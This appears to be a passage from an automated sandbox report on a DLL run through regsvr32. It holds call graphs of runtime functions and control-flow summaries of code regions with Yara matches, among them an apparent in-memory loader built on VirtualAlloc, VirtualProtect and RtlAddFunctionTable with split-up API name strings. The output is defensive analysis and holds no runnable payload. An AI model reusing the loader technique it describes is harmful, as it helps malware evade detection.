7ffc67209df8 10201->10213 10202 7ffc67203024 45 API calls free 10202->10205 10208 7ffc67204fe2 10203->10208 10209 7ffc67204f77 10204->10209 10205->10198 10205->10202 10210 7ffc67203024 free 45 API calls 10206->10210 10211 7ffc67203024 free 45 API calls 10208->10211 10229 7ffc67209b68 10209->10229 10210->10187 10211->10186 10214 7ffc67209e01 10213->10214 10227 7ffc67209e87 10213->10227 10215 7ffc67209e1b 10214->10215 10216 7ffc67203024 free 45 API calls 10214->10216 10217 7ffc67209e2d 10215->10217 10218 7ffc67203024 free 45 API calls 10215->10218 10216->10215 10219 7ffc67203024 free 45 API calls 10217->10219 10220 7ffc67209e3f 10217->10220 10218->10217 10219->10220 10221 7ffc67209e51 10220->10221 10222 7ffc67203024 free 45 API calls 10220->10222 10223 7ffc67209e63 10221->10223 10224 7ffc67203024 free 45 API calls 10221->10224 10222->10221 10225 7ffc67209e75 10223->10225 10226 7ffc67203024 free 45 API calls 10223->10226 10224->10223 10225->10227 10228 7ffc67203024 free 45 API calls 10225->10228 10226->10225 10227->10190 10228->10227 10230 7ffc67209b6d 10229->10230 10235 7ffc67209baa 10229->10235 10231 7ffc67209b86 10230->10231 10232 7ffc67203024 free 45 API calls 10230->10232 10233 7ffc67209b98 10231->10233 10234 7ffc67203024 free 45 API calls 10231->10234 10232->10231 10233->10235 10236 7ffc67203024 free 45 API calls 10233->10236 10234->10233 10235->10194 10236->10235 10238 7ffc672098ad 10237->10238 10324 7ffc6720500f 10237->10324 10239 7ffc67203024 free 45 API calls 10238->10239 10240 7ffc672098be 10239->10240 10241 7ffc67203024 free 45 API calls 10240->10241 10242 7ffc672098c7 10241->10242 10243 7ffc67203024 free 45 API calls 10242->10243 10244 7ffc672098d0 10243->10244 10245 7ffc67203024 free 45 API calls 10244->10245 10246 7ffc672098d9 10245->10246 10247 7ffc67203024 free 45 API calls 10246->10247 10248 7ffc672098e2 10247->10248 10249 7ffc67203024 free 45 API calls 10248->10249 10250 7ffc672098eb 10249->10250 10251 7ffc67203024 free 45 API calls 10250->10251 10252 7ffc672098f3 10251->10252 10253 7ffc67203024 free 45 API calls 10252->10253 10254 7ffc672098fc 10253->10254 10255 7ffc67203024 free 45 API calls 10254->10255 10256 7ffc67209905 10255->10256 10257 7ffc67203024 free 45 API calls 10256->10257 10258 7ffc6720990e 10257->10258 10259 7ffc67203024 free 45 API calls 10258->10259 10260 7ffc67209917 10259->10260 10261 7ffc67203024 free 45 API calls 10260->10261 10262 7ffc67209920 10261->10262 10263 7ffc67203024 free 45 API calls 10262->10263 10264 7ffc67209929 10263->10264 10265 7ffc67203024 free 45 API calls 10264->10265 10266 7ffc67209932 10265->10266 10267 7ffc67203024 free 45 API calls 10266->10267 10268 7ffc6720993b 10267->10268 10269 7ffc67203024 free 45 API calls 10268->10269 10270 7ffc67209944 10269->10270 10271 7ffc67203024 free 45 API calls 10270->10271 10272 7ffc67209950 10271->10272 10273 7ffc67203024 free 45 API calls 10272->10273 10274 7ffc6720995c 10273->10274 10275 7ffc67203024 free 45 API calls 10274->10275 10276 7ffc67209968 10275->10276 10277 7ffc67203024 free 45 API calls 10276->10277 10278 7ffc67209974 10277->10278 10279 7ffc67203024 free 45 API calls 10278->10279 10280 7ffc67209980 10279->10280 10281 7ffc67203024 free 45 API calls 10280->10281 10282 7ffc6720998c 10281->10282 10283 7ffc67203024 free 45 API calls 10282->10283 10284 7ffc67209998 10283->10284 10285 7ffc67203024 free 45 API calls 10284->10285 10286 7ffc672099a4 10285->10286 10287 7ffc67203024 free 45 API calls 10286->10287 10288 7ffc672099b0 10287->10288 10289 7ffc67203024 free 45 API calls 10288->10289 10290 7ffc672099bc 10289->10290 10291 7ffc67203024 free 45 API calls 10290->10291 10292 7ffc672099c8 10291->10292 10293 7ffc67203024 free 45 API calls 10292->10293 10294 7ffc672099d4 10293->10294 10295 7ffc67203024 free 45 API calls 10294->10295 10296 7ffc672099e0 10295->10296 10297 7ffc67203024 free 45 API calls 10296->10297 10298 7ffc672099ec 10297->10298 10299 7ffc67203024 free 45 API calls 10298->10299 10300 7ffc672099f8 10299->10300 10301 7ffc67203024 free 45 API calls 10300->10301 10302 7ffc67209a04 10301->10302 10303 7ffc67203024 free 45 API calls 10302->10303 10304 7ffc67209a10 10303->10304 10305 7ffc67203024 free 45 API calls 10304->10305 10306 7ffc67209a1c 10305->10306 10307 7ffc67203024 free 45 API calls 10306->10307 10308 7ffc67209a28 10307->10308 10309 7ffc67203024 free 45 API calls 10308->10309 10310 7ffc67209a34 10309->10310 10311 7ffc67203024 free 45 API calls 10310->10311 10312 7ffc67209a40 10311->10312 10313 7ffc67203024 free 45 API calls 10312->10313 10314 7ffc67209a4c 10313->10314 10315 7ffc67203024 free 45 API calls 10314->10315 10316 7ffc67209a58 10315->10316 10317 7ffc67203024 free 45 API calls 10316->10317 10318 7ffc67209a64 10317->10318 10319 7ffc67203024 free 45 API calls 10318->10319 10320 7ffc67209a70 10319->10320 10321 7ffc67203024 free 45 API calls 10320->10321 10322 7ffc67209a7c 10321->10322 10323 7ffc67203024 free 45 API calls 10322->10323 10323->10324 10324->10200 10326 7ffc6720480a 10325->10326 10327 7ffc6720471e unexpected 10325->10327 10330 7ffc672020e0 __initmbctable 8 API calls 10326->10330 10346 7ffc672091a0 10327->10346 10332 7ffc672048aa 10330->10332 10332->10139 10334 7ffc67208e9c __initmbctable 78 API calls 10334->10326 10336 7ffc672020e9 10335->10336 10337 7ffc672020f4 10336->10337 10338 7ffc672023e8 RtlCaptureContext RtlLookupFunctionEntry 10336->10338 10337->10143 10339 7ffc6720246d 10338->10339 10340 7ffc6720242c RtlVirtualUnwind 10338->10340 10341 7ffc6720248f IsDebuggerPresent 10339->10341 10340->10341 10462 7ffc6720460c 10341->10462 10343 7ffc672024ee SetUnhandledExceptionFilter UnhandledExceptionFilter 10344 7ffc67202516 GetCurrentProcess TerminateProcess 10343->10344 10345 7ffc6720250c _invalid_parameter_noinfo 10343->10345 10344->10143 10345->10344 10347 7ffc67202534 _wcstoui64_l 45 API calls 10346->10347 10348 7ffc672091c4 10347->10348 10356 7ffc67208f34 10348->10356 10351 7ffc67208e9c 10352 7ffc67202534 _wcstoui64_l 45 API calls 10351->10352 10353 7ffc67208ec0 10352->10353 10415 7ffc6720895c 10353->10415 10357 7ffc67208fc1 10356->10357 10358 7ffc67208f84 GetStringTypeW 10356->10358 10359 7ffc67208f9e 10357->10359 10361 7ffc672090f0 10357->10361 10358->10359 10360 7ffc67208fa6 GetLastError 10358->10360 10362 7ffc67208fea MultiByteToWideChar 10359->10362 10371 7ffc672090e9 10359->10371 10360->10357 10380 7ffc6720e1e8 GetLocaleInfoA 10361->10380 10366 7ffc67209018 10362->10366 10362->10371 10364 7ffc672020e0 __initmbctable 8 API calls 10367 7ffc672047a1 10364->10367 10369 7ffc6720903d unexpected wcsftime 10366->10369 10372 7ffc67206c34 realloc 45 API calls 10366->10372 10367->10351 10368 7ffc6720914b GetStringTypeA 10370 7ffc6720916e 10368->10370 10368->10371 10369->10371 10376 7ffc672090a4 MultiByteToWideChar 10369->10376 10375 7ffc67203024 free 45 API calls 10370->10375 10371->10364 10372->10369 10375->10371 10377 7ffc672090c6 GetStringTypeW 10376->10377 10378 7ffc672090db 10376->10378 10377->10378 10378->10371 10379 7ffc67203024 free 45 API calls 10378->10379 10379->10371 10381 7ffc6720e21f 10380->10381 10382 7ffc6720e21a 10380->10382 10411 7ffc67202100 10381->10411 10384 7ffc672020e0 __initmbctable 8 API calls 10382->10384 10385 7ffc6720911a 10384->10385 10385->10368 10385->10371 10386 7ffc6720e23c 10385->10386 10387 7ffc6720e28e GetCPInfo 10386->10387 10388 7ffc6720e366 10386->10388 10389 7ffc6720e33f MultiByteToWideChar 10387->10389 10390 7ffc6720e2a0 10387->10390 10391 7ffc672020e0 __initmbctable 8 API calls 10388->10391 10389->10388 10395 7ffc6720e2c5 __wtomb_environ 10389->10395 10390->10389 10392 7ffc6720e2aa GetCPInfo 10390->10392 10393 7ffc67209140 10391->10393 10392->10389 10394 7ffc6720e2bf 10392->10394 10393->10368 10393->10371 10394->10389 10394->10395 10396 7ffc67206c34 realloc 45 API calls 10395->10396 10398 7ffc6720e301 unexpected wcsftime 10395->10398 10396->10398 10397 7ffc6720e39d MultiByteToWideChar 10399 7ffc6720e3ff 10397->10399 10400 7ffc6720e3c7 10397->10400 10398->10388 10398->10397 10399->10388 10405 7ffc67203024 free 45 API calls 10399->10405 10401 7ffc6720e3cc WideCharToMultiByte 10400->10401 10402 7ffc6720e407 10400->10402 10401->10399 10403 7ffc6720e40d WideCharToMultiByte 10402->10403 10404 7ffc6720e439 10402->10404 10403->10399 10403->10404 10406 7ffc67203108 __wtomb_environ 45 API calls 10404->10406 10405->10388 10407 7ffc6720e446 10406->10407 10407->10399 10408 7ffc6720e44e WideCharToMultiByte 10407->10408 10408->10399 10409 7ffc6720e477 10408->10409 10410 7ffc67203024 free 45 API calls 10409->10410 10410->10399 10412 7ffc6720287c 10411->10412 10413 7ffc672025f8 _wcstoui64_l 67 API calls 10412->10413 10414 7ffc672028a7 10413->10414 10414->10382 10416 7ffc672089b4 LCMapStringW 10415->10416 10419 7ffc672089d8 10415->10419 10417 7ffc672089e4 GetLastError 10416->10417 10416->10419 10417->10419 10418 7ffc67208ca6 10422 7ffc6720e1e8 _wcstoui64_l 67 API calls 10418->10422 10419->10418 10420 7ffc67208a53 10419->10420 10421 7ffc67208c9f 10420->10421 10423 7ffc67208a71 MultiByteToWideChar 10420->10423 10424 7ffc672020e0 __initmbctable 8 API calls 10421->10424 10425 7ffc67208cd4 10422->10425 10423->10421 10432 7ffc67208aa0 10423->10432 10426 7ffc672047d4 10424->10426 10425->10421 10428 7ffc67208e2f LCMapStringA 10425->10428 10429 7ffc67208cf3 10425->10429 10426->10334 10427 7ffc67208b1c MultiByteToWideChar 10430 7ffc67208c91 10427->10430 10431 7ffc67208b46 LCMapStringW 10427->10431 10444 7ffc67208d3b 10428->10444 10433 7ffc6720e23c _wcstoui64_l 60 API calls 10429->10433 10430->10421 10439 7ffc67203024 free 45 API calls 10430->10439 10431->10430 10434 7ffc67208b70 10431->10434 10435 7ffc67208ad1 wcsftime 10432->10435 10436 7ffc67206c34 realloc 45 API calls 10432->10436 10437 7ffc67208d0b 10433->10437 10440 7ffc67208b7b 10434->10440 10447 7ffc67208bb6 10434->10447 10435->10421 10435->10427 10436->10435 10437->10421 10441 7ffc67208d13 LCMapStringA 10437->10441 10438 7ffc67208e5f 10438->10421 10445 7ffc67203024 free 45 API calls 10438->10445 10439->10421 10440->10430 10443 7ffc67208b92 LCMapStringW 10440->10443 10441->10444 10449 7ffc67208d42 10441->10449 10442 7ffc67203024 free 45 API calls 10442->10438 10443->10430 10444->10438 10444->10442 10445->10421 10446 7ffc67208c23 LCMapStringW 10450 7ffc67208c83 10446->10450 10451 7ffc67208c44 WideCharToMultiByte 10446->10451 10448 7ffc67206c34 realloc 45 API calls 10447->10448 10455 7ffc67208bd4 wcsftime 10447->10455 10448->10455 10453 7ffc67208d63 unexpected wcsftime 10449->10453 10454 7ffc67206c34 realloc 45 API calls 10449->10454 10450->10430 10459 7ffc67203024 free 45 API calls 10450->10459 10451->10450 10452 7ffc67208dc5 LCMapStringA 10456 7ffc67208ded 10452->10456 10457 7ffc67208df1 10452->10457 10453->10444 10453->10452 10454->10453 10455->10430 10455->10446 10456->10444 10461 7ffc67203024 free 45 API calls 10456->10461 10460 7ffc6720e23c _wcstoui64_l 60 API calls 10457->10460 10459->10430 10460->10456 10461->10444 10462->10343 10464 7ffc67206af6 10463->10464 10465 7ffc67206adf 10463->10465 10467 7ffc67206b0b 10464->10467 10469 7ffc6720309c __setargv 44 API calls 10464->10469 10466 7ffc67207160 _FF_MSGBANNER 44 API calls 10465->10466 10468 7ffc67206ae4 10466->10468 10467->10147 10467->10151 10471 7ffc67206f0c _FF_MSGBANNER 44 API calls 10468->10471 10470 7ffc67206b19 10469->10470 10472 7ffc67206b21 10470->10472 10473 7ffc67206b30 10470->10473 10474 7ffc67206aec 10471->10474 10475 7ffc672067e0 _errno 44 API calls 10472->10475 10476 7ffc67206ba0 _lock 44 API calls 10473->10476 10477 7ffc6720334c realloc 3 API calls 10474->10477 10475->10467 10478 7ffc67206b3a 10476->10478 10477->10464 10479 7ffc67206b43 10478->10479 10480 7ffc67206b72 10478->10480 10482 7ffc67207ee4 _lock InitializeCriticalSectionAndSpinCount 10479->10482 10481 7ffc67203024 free 44 API calls 10480->10481 10483 7ffc67206b61 LeaveCriticalSection 10481->10483 10484 7ffc67206b50 10482->10484 10483->10467 10484->10483 10486 7ffc67203024 free 44 API calls 10484->10486 10487 7ffc67206b5c 10486->10487 10488 7ffc672067e0 _errno 44 API calls 10487->10488 10488->10483 10490 7ffc6720740a EncodePointer 10489->10490 10490->10490 10491 7ffc6720741f 10490->10491 10491->9891 10495 7ffc672072d4 10492->10495 10508 7ffc67203364 10495->10508 10510 7ffc67206d01 10509->10510 10512 7ffc67206d33 realloc 10509->10512 10511 7ffc67206d0f 10510->10511 10510->10512 10513 7ffc672067e0 _errno 44 API calls 10511->10513 10514 7ffc67206d4b RtlAllocateHeap 10512->10514 10516 7ffc67206d2f 10512->10516 10515 7ffc67206d14 10513->10515 10514->10512 10514->10516 10517 7ffc672066d8 _invalid_parameter_noinfo 7 API calls 10515->10517 10516->9895 10517->10516 10520 7ffc67202e21 10519->10520 10548 7ffc67202f42 10519->10548 10521 7ffc67202e3c 10520->10521 10522 7ffc67203024 free 45 API calls 10520->10522 10523 7ffc67202e4a 10521->10523 10524 7ffc67203024 free 45 API calls 10521->10524 10522->10521 10525 7ffc67202e58 10523->10525 10526 7ffc67203024 free 45 API calls 10523->10526 10524->10523 10527 7ffc67202e66 10525->10527 10528 7ffc67203024 free 45 API calls 10525->10528 10526->10525 10529 7ffc67202e74 10527->10529 10531 7ffc67203024 free 45 API calls 10527->10531 10528->10527 10530 7ffc67202e82 10529->10530 10532 7ffc67203024 free 45 API calls 10529->10532 10533 7ffc67203024 free 45 API calls 10530->10533 10535 7ffc67202e93 10530->10535 10531->10529 10532->10530 10533->10535 10534 7ffc67202eab 10537 7ffc67206ba0 _lock 45 API calls 10534->10537 10535->10534 10536 7ffc67203024 free 45 API calls 10535->10536 10536->10534 10541 7ffc67202eb5 10537->10541 10538 7ffc67202ee3 10551 7ffc67206a80 LeaveCriticalSection 10538->10551 10541->10538 10543 7ffc67203024 free 45 API calls 10541->10543 10543->10538 10548->9922 10552 7ffc67202050 10555 7ffc671c1000 10552->10555 10556 7ffc671c101e ExitProcess 10555->10556

                                                                                                                                                Control-flow Graph

                                                                                                                                                • Executed
                                                                                                                                                • Not Executed
                                                                                                                                                control_flow_graph 8 b00000-b00460 call b00aa8 * 2 VirtualAlloc 30 b00462-b00466 8->30 31 b0048a-b00494 8->31 32 b00468-b00488 30->32 34 b00a91-b00aa6 31->34 35 b0049a-b0049e 31->35 32->31 32->32 35->34 36 b004a4-b004a8 35->36 36->34 37 b004ae-b004b2 36->37 37->34 38 b004b8-b004bf 37->38 38->34 39 b004c5-b004d2 38->39 39->34 40 b004d8-b004e1 39->40 40->34 41 b004e7-b004f4 40->41 41->34 42 b004fa-b00507 41->42 43 b00531-b00567 GetNativeSystemInfo 42->43 44 b00509-b00511 42->44 43->34 46 b0056d-b00589 VirtualAlloc 43->46 45 b00513-b00518 44->45 47 b00521 45->47 48 b0051a-b0051f 45->48 49 b005a0-b005ac 46->49 50 b0058b-b0059e 46->50 51 b00523-b0052f 47->51 48->51 52 b005af-b005b2 49->52 50->49 51->43 51->45 54 b005c1-b005db 52->54 55 b005b4-b005bf 52->55 56 b0061b-b00622 54->56 57 b005dd-b005e2 54->57 55->52 58 b00628-b0062f 56->58 59 b006db-b006e2 56->59 60 b005e4-b005ea 57->60 58->59 61 b00635-b00642 58->61 62 b00864-b0086b 59->62 63 b006e8-b006f9 59->63 64 b0060b-b00619 60->64 65 b005ec-b00609 60->65 61->59 68 b00648-b0064f 61->68 66 b00871-b0087f 62->66 67 b00917-b00929 62->67 69 b00702-b00705 63->69 64->56 64->60 65->64 65->65 72 b0090e-b00911 66->72 70 b00a07-b00a1a 67->70 71 b0092f-b00937 67->71 73 b00654-b00658 68->73 74 b00707-b0070a 69->74 75 b006fb-b006ff 69->75 96 b00a40-b00a4a 70->96 97 b00a1c-b00a27 70->97 77 b0093b-b0093f 71->77 72->67 76 b00884-b008a9 72->76 78 b006c0-b006ca 73->78 79 b00788-b0078e 74->79 80 b0070c-b0071d 74->80 75->69 102 b00907-b0090c 76->102 103 b008ab-b008b1 76->103 83 b00945-b0095a 77->83 84 b009ec-b009fa 77->84 81 b0065a-b00669 78->81 82 b006cc-b006d2 78->82 85 b00794-b007a2 79->85 80->85 86 b0071f-b00720 80->86 92 b0067a-b0067e 81->92 93 b0066b-b00678 81->93 82->73 88 b006d4-b006d5 82->88 90 b0097b-b0097d 83->90 91 b0095c-b0095e 83->91 84->77 94 b00a00-b00a01 84->94 98 b007a8 85->98 99 b0085d-b0085e 85->99 95 b00722-b00784 86->95 88->59 107 b009a2-b009a4 90->107 108 b0097f-b00981 90->108 104 b00960-b0096c 91->104 105 b0096e-b00979 91->105 109 b00680-b0068a 92->109 110 b0068c-b00690 92->110 106 b006bd-b006be 93->106 94->70 95->95 111 b00786 95->111 100 b00a7b-b00a8e 96->100 101 b00a4c-b00a54 96->101 112 b00a38-b00a3e 97->112 113 b007ae-b007d4 98->113 99->62 100->34 101->100 119 b00a56-b00a79 RtlAddFunctionTable 101->119 102->72 116 b008b3-b008b9 103->116 117 b008bb-b008c8 103->117 120 b009be-b009bf 104->120 105->120 106->78 114 b009a6-b009aa 107->114 115 b009ac-b009bb 107->115 121 b00983-b00987 108->121 122 b00989-b0098b 108->122 123 b006b6-b006ba 109->123 124 b00692-b006a3 110->124 125 b006a5-b006a9 110->125 111->85 112->96 118 b00a29-b00a35 112->118 137 b00835-b00839 113->137 138 b007d6-b007d9 113->138 114->120 115->120 127 b008ea-b008fe 116->127 128 b008d3-b008e5 117->128 129 b008ca-b008d1 117->129 118->112 119->100 126 b009c5-b009cb 120->126 121->120 122->107 132 b0098d-b0098f 122->132 123->106 124->123 125->106 133 b006ab-b006b3 125->133 134 b009d9-b009e9 VirtualProtect 126->134 135 b009cd-b009d3 126->135 127->102 146 b00900-b00905 127->146 128->127 129->128 129->129 139 b00991-b00997 132->139 140 b00999-b009a0 132->140 133->123 134->84 135->134 144 b00844-b00850 137->144 145 b0083b 137->145 142 b007e3-b007f0 138->142 143 b007db-b007e1 138->143 139->120 140->126 148 b007f2-b007f9 142->148 149 b007fb-b0080d 142->149 147 b00812-b0082c 143->147 144->113 150 b00856-b00857 144->150 145->144 146->103 147->137 152 b0082e-b00833 147->152 148->148 148->149 149->147 150->99 152->138
                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.280398677.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_b00000_regsvr32.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Virtual$Alloc$FunctionInfoNativeProtectSystemTable
                                                                                                                                                • String ID: Cach$Find$Flus$Free$GetN$Libr$Load$Load$Lock$Reso$Reso$Reso$Reso$RtlA$Size$Slee$Virt$Virt$aryA$ativ$ddFu$eSys$hIns$lloc$ncti$ofRe$onTa$rote$sour$temI$tion$truc$ualA$ualP$urce$urce$urce$urce
                                                                                                                                                • API String ID: 394283112-2517549848
                                                                                                                                                • Opcode ID: 590c178917582490f2a8474f3428d2fdec128c188f960b73743dba758a98ecc8
                                                                                                                                                • Instruction ID: 9c2519bfa2a062c8225b097bd76105bed94d2b7f148a2f2ee7b6e2dd08d98906
                                                                                                                                                • Opcode Fuzzy Hash: 590c178917582490f2a8474f3428d2fdec128c188f960b73743dba758a98ecc8
                                                                                                                                                • Instruction Fuzzy Hash: 6F72C630628B488FDB19EF18C8857B9BBE1FB98305F10466DE88BD7251DB34D946CB85
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Control-flow Graph

                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.280788460.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: #C$(I$-:$Ekf$<W$Z$l$l
                                                                                                                                                • API String ID: 0-464535774
                                                                                                                                                • Opcode ID: d8792019bb8cd892c5e2cff0ba87425d7977148afb5a5f987cda1e45d5ff9126
                                                                                                                                                • Instruction ID: edc4d0e98499d5b5adff65828f8d1fd2ac7ce79502a6533da94e18623254a36a
                                                                                                                                                • Opcode Fuzzy Hash: d8792019bb8cd892c5e2cff0ba87425d7977148afb5a5f987cda1e45d5ff9126
                                                                                                                                                • Instruction Fuzzy Hash: C102E3B151038CDBCB99DF28C8CAADD3BA1FB48398F956219FD0697260D774D884CB85
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Control-flow Graph

                                                                                                                                                • Executed
                                                                                                                                                • Not Executed
                                                                                                                                                control_flow_graph 253 180007958-1800079e2 call 1800142a0 256 1800079e5-1800079eb 253->256 257 1800079f1 256->257 258 180007f68-180007f6e 256->258 261 180007eb7-180007f4d call 180021434 257->261 262 1800079f7-1800079fd 257->262 259 180008084-180008101 call 180021434 258->259 260 180007f74-180007f7a 258->260 281 180008103-180008108 259->281 282 18000810d 259->282 265 180007fb4-180008075 call 18001e794 260->265 266 180007f7c-180007f82 260->266 272 180007f52-180007f58 261->272 267 180007d01-180007e4c call 180008738 262->267 268 180007a03-180007a09 262->268 280 18000807a-18000807f 265->280 273 180007f84-180007f8a 266->273 274 180007f9a-180007faf 266->274 267->280 290 180007e52-180007eaf call 18001d408 267->290 275 180007c76-180007cf7 call 180013e28 268->275 276 180007a0f-180007a15 268->276 283 1800081dd-1800081fd 272->283 284 180007f5e 272->284 286 18000811e-180008124 273->286 287 180007f90-180007f95 273->287 274->256 275->267 277 180007a1b-180007a21 276->277 278 180007b1d-180007c71 call 180018c60 call 180001b1c 276->278 288 180007a27-180007a2d 277->288 289 18000812f-1800081d8 call 180013e28 277->289 293 180008112-18000811b 278->293 292 180007b0c-180007b18 281->292 282->293 284->258 286->283 294 18000812a 286->294 287->256 288->286 296 180007a33-180007af3 call 18002b4c4 288->296 289->283 290->261 292->256 293->286 294->256 303 180007af8-180007b06 296->303 303->292
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.280788460.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: 0n)G$9i&$IS_$c)K$oh$oh$J
                                                                                                                                                • API String ID: 0-4168131144
                                                                                                                                                • Opcode ID: 30d22681d77451a804741155910a8214494d75842a214bfc255a7dbc84502ded
                                                                                                                                                • Instruction ID: 1745985c1503e7a5a98bbeacef01b65c9f03634c62e3202666f04ad1fcc3199d
                                                                                                                                                • Opcode Fuzzy Hash: 30d22681d77451a804741155910a8214494d75842a214bfc255a7dbc84502ded
                                                                                                                                                • Instruction Fuzzy Hash: 69423870A0470CABCB58DF68C58AADEBBF1FB44304F40C169EC4AAB250D7759B19CB85
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Control-flow Graph

                                                                                                                                                • Executed
                                                                                                                                                • Not Executed
                                                                                                                                                control_flow_graph 355 180010ff4-180011016 356 180011020 355->356 357 180011022-180011028 356->357 358 180011814 357->358 359 18001102e-180011034 357->359 362 180011819-18001181f 358->362 360 1800114e2-1800114ec 359->360 361 18001103a-180011040 359->361 365 1800114f5-18001151d 360->365 366 1800114ee-1800114f3 360->366 363 1800113e2-1800114d2 call 180008200 361->363 364 180011046-18001104c 361->364 362->357 367 180011825-180011832 362->367 363->367 374 1800114d8-1800114dd 363->374 364->362 368 180011052-18001120b call 180021040 call 1800291ac 364->368 369 180011523-1800117f4 call 180016314 call 1800291ac call 18001e2bc 365->369 366->369 381 180011212-1800113d7 call 1800291ac call 18001e2bc 368->381 382 18001120d 368->382 385 1800117f9-180011803 369->385 374->357 381->367 390 1800113dd 381->390 382->381 385->367 387 180011805-18001180f 385->387 387->357 390->356
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.280788460.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: )|x$/Zb$/v|$OV4T$\$lA
                                                                                                                                                • API String ID: 0-3528011396
                                                                                                                                                • Opcode ID: 74ea3d61a93069fa3a56a5f8f60d4b0c7eeb5b014d6ac06c6862fd203c8e6463
                                                                                                                                                • Instruction ID: 5dbdb21e6b24644f90705741d0e2e2cc24c858ca1caac6c8284349b4f9dc1789
                                                                                                                                                • Opcode Fuzzy Hash: 74ea3d61a93069fa3a56a5f8f60d4b0c7eeb5b014d6ac06c6862fd203c8e6463
                                                                                                                                                • Instruction Fuzzy Hash: 8C2204705097C8CBDBBECF64C885BDA7BA8FB44B08F10521DEA4A9E258DB745744CB41
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Control-flow Graph

                                                                                                                                                • Executed
                                                                                                                                                • Not Executed
                                                                                                                                                control_flow_graph 391 180021618-180021653 392 180021655-18002165a 391->392 393 180021bf3-180021c25 392->393 394 180021660-180021665 392->394 395 180021c2a-180021c2f 393->395 396 180021a81-180021bda call 180016314 394->396 397 18002166b-180021670 394->397 399 180021838-180021845 395->399 400 180021c35 395->400 404 180021bdf-180021bee 396->404 401 1800219f3-180021a7c call 180001b1c 397->401 402 180021676-18002167b 397->402 400->392 401->392 405 1800219e4-1800219ee 402->405 406 180021681-180021686 402->406 404->392 405->392 408 1800219d5-1800219df call 18001dfb4 406->408 409 18002168c-180021691 406->409 408->392 410 180021697-18002169c 409->410 411 18002190c-1800219a5 call 18000abac 409->411 415 1800216a2-1800216a7 410->415 416 180021846-180021907 call 180021434 410->416 419 1800219aa-1800219b0 411->419 415->395 417 1800216ad-180021835 call 180008200 call 1800166c0 415->417 416->392 417->399 422 1800219b2-1800219c6 419->422 423 1800219cb-1800219d0 419->423 422->392 423->392
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.280788460.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: $&.+$)O$.pN$F>9$t(/
                                                                                                                                                • API String ID: 0-3036092626
                                                                                                                                                • Opcode ID: 549a8b626face2190b4149bba4d09d4cb88f6d29378e8937dde350adb7fd5a83
                                                                                                                                                • Instruction ID: e4baced68933c0a0796cf32b330105f1a6d3ed4de4784e8c7f389f9334031704
                                                                                                                                                • Opcode Fuzzy Hash: 549a8b626face2190b4149bba4d09d4cb88f6d29378e8937dde350adb7fd5a83
                                                                                                                                                • Instruction Fuzzy Hash: E6E109716093C89FEBBACF24C8897DE7BA1FB59344F50421DD88A8E250DB745B49CB42
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Control-flow Graph

                                                                                                                                                • Executed
                                                                                                                                                • Not Executed
                                                                                                                                                control_flow_graph 456 180028c20-180028c53 457 180028c58-180028c5e 456->457 458 180028c64-180028c6a 457->458 459 1800290ae-180029147 call 180013e28 457->459 460 1800290a4-1800290a9 458->460 461 180028c70-180028c76 458->461 469 18002914c-180029152 459->469 460->457 463 180029003-18002909f call 180008ea0 461->463 464 180028c7c-180028c82 461->464 463->457 467 180028c88-180028c8e 464->467 468 180028fab-180028ffe call 1800223c4 464->468 471 180028c94-180028c9a 467->471 472 180028df6-180028e1e 467->472 468->457 473 180029154 469->473 474 18002919c-1800291a8 469->474 477 180028d62-180028ddb call 180016bd8 471->477 478 180028ca0-180028ca6 471->478 472->457 476 180028e24-180028e3c 472->476 473->457 480 180028e42-180028ee6 call 18001d49c 476->480 481 180028ee9-180028f0b 476->481 490 180028de0-180028de6 477->490 482 180028cac-180028cb2 478->482 483 180029159-180029197 call 1800164c8 478->483 480->481 486 180028f94-180028f95 481->486 487 180028f11-180028f92 call 18001d49c 481->487 482->469 488 180028cb8-180028d5d call 180010c00 482->488 483->474 494 180028f98-180028f9b 486->494 487->494 488->457 490->474 491 180028dec-180028df1 490->491 491->457 494->457 497 180028fa1-180028fa6 494->497 497->457
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
